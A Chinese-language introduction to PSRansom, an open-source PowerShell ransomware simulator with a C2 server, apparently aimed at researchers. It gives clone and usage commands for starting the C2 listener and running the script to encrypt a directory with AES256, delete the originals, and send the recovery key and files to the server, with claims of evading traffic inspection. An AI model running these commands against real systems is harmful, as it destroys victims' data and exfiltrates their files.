關(guān)于PSRansom

PSRansom是一款帶有C2服務(wù)器功能的PowerShell勒索軟件模擬工具，該工具可以幫助廣大研究人員模擬針對任何操作系統(tǒng)平臺(只要安裝了PowerShell即可)的通用勒索軟件數(shù)據(jù)加密過程。在C2服務(wù)器功能的幫助下，我們甚至還可以通過HTTP從目標設(shè)備(客戶端)中提取文件，并在服務(wù)器端接收信息。

客戶端和服務(wù)器端之間的通信數(shù)據(jù)都經(jīng)過了加密和編碼，因此是無法被基于流量審計的檢查工具所檢測到的。

工具要求

PowerShell 4.0或更高版本

工具下載

廣大研究人員可以使用下列命令將該項目源碼克隆至本地：git clone https://github.com/JoelGMSec/PSRansom

或者直接訪問該項目的【??Releases頁面??】下載工具的壓縮文件。

下載完成之后，我們將拿到兩個腳本：PSRansom和C2Server。第一個將模擬勒索軟件感染，而第二個將負責恢復文件及其恢復密鑰。

工具使用

該工具的使用非常簡單，我們只需要指明要加密的目錄、C2 服務(wù)器的 IP 或主機名以及接收連接的端口。

除此之外，如果我們需要發(fā)送加密文件，則需要在命令結(jié)尾添加-x參數(shù)選項即可。在解密的時候，只需要指明目錄和恢復密鑰即可。

工具使用樣例

首先，我們的測試場景定義如下：

• 勒索軟件將在 Windows 機器上運行
• 我們要加密的文件夾位于 C:\Backup
• C2 服務(wù)器將在 Kali Linux 上運行
• 所有流量都將通過代理查看詳細信息

接下來，我們看看該工具提供了哪些操作選項：

命令和控制服務(wù)器的使用也非常簡單，我們只需要指明監(jiān)聽連接的端口和接收連接的端口即可。這里，我們使用的是80端口：

pwsh C2Server.ps1 + 80

接下來，我們將使用以下命令運行加密和滲透：

.\PSRansom.ps1 -e directory -s ServerC2 -p port -x

此時將生成24 個字母數(shù)字字符(小寫、大寫和數(shù)字)的隨機密鑰，數(shù)據(jù)將以 AES256 加密，并將恢復密鑰發(fā)送到 C2 服務(wù)器。

完成后，原始文件將被刪除，僅保留加密的文件：

服務(wù)器端將接收到類似如下圖所示的內(nèi)容：

現(xiàn)在，我們將在服務(wù)器端接收到目標設(shè)備的信息、恢復密鑰、加密文件列表等：

許可證協(xié)議

本項目的開發(fā)與發(fā)布遵循??GPL-3.0??開源許可證協(xié)議。

項目地址

PSRansom：【??GitHub傳送門??】